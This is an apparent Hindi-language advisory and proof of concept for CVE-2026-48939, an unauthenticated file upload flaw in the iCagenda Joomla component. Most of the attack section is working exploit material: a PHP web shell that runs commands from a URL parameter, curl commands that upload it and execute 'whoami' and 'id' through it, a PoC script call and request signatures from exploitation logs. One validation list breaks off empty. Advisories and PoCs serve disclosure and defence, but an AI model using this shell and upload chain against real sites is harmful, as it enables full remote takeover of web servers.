
iCagenda Unauthenticated File Upload to RCE
| फ़ील्ड | मान |
|---|---|
| CVE ID | CVE-2026-48939 |
| CVSS 4.0 स्कोर | 10.0 क्रिटिकल |
| CVSS वेक्टर | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-284: अनुचित अभिगम नियंत्रण |
| प्रभावित संस्करण | iCagenda 3.2.1 - 3.9.14 और 4.0.0 - 4.0.7 |
| समाधान संस्करण | iCagenda 4.0.8 और 3.9.15 |
| प्रकाशित | 20 जून 2026 |
iCagenda, Joomla के लिए एक लोकप्रिय इवेंट्स और कैलेंडर घटक, में बिना प्रमाणीकरण के फ़ाइल अपलोड भेद्यता मौजूद है जो दूरस्थ हमलावरों को Joomla 6 साइटों पर मनमाना PHP कोड अपलोड करने और निष्पादित करने की अनुमति देती है।
भेद्यता फ्रंटएंड इवेंट सबमिशन फ़ॉर्म की फ़ाइल संलग्नक सुविधा में मौजूद है:
अनुपलब्ध अभिगम नियंत्रण: सबमिट एंडपॉइंट (index.php?option=com_icagenda&task=registration.submit) प्रमाणीकरण लागू नहीं करता है, जिससे "केवल पंजीकृत" अभिगम सेटिंग को दरकिनार किया जा सकता है।
कोई फ़ाइल सत्यापन नहीं: अपलोड की गई फ़ाइलें बिना निम्न के मूल एक्सटेंशन के साथ सहेजी जाती हैं:
प्रत्यक्ष फ़ाइल लेखन: फ़ाइलें वेब रूट के अंतर्गत सीधे /images/icagenda/frontend/attachments/[filename] में लिखी जाती हैं।
PHP निष्पादन: Joomla 6 पर, अपलोड की गई .php फ़ाइलें निष्पादन योग्य होती हैं, जिससे दूरस्थ कोड निष्पादन (RCE) होता है।
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF
# Upload the shell
curl -k -s \
-F "title=Test Event" \
-F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
"https://poloss-jomola.ddev.site/icagenda_submit.php"
# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
# Navigate to project directory
# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
भेद्य एंडपॉइंट पहचानें:
https://target.com/index.php?option=com_icagenda&task=submit
PHP वेब शेल अपलोड करें:
curl -X POST -F "jform[attachment][email protected]" \
"https://target.com/index.php?option=com_icagenda&task=submit"
शेल निष्पादित करें:
curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
वास्तविक दुनिया के शोषण लॉग के आधार पर, हमले का सिग्नेचर इस प्रकार है:
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
com_icagenda फ़ोल्डरों को अस्थायी रूप से हटाएँ या उनका नाम बदलेंयह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनाधिकृत पहुँच अवैध है।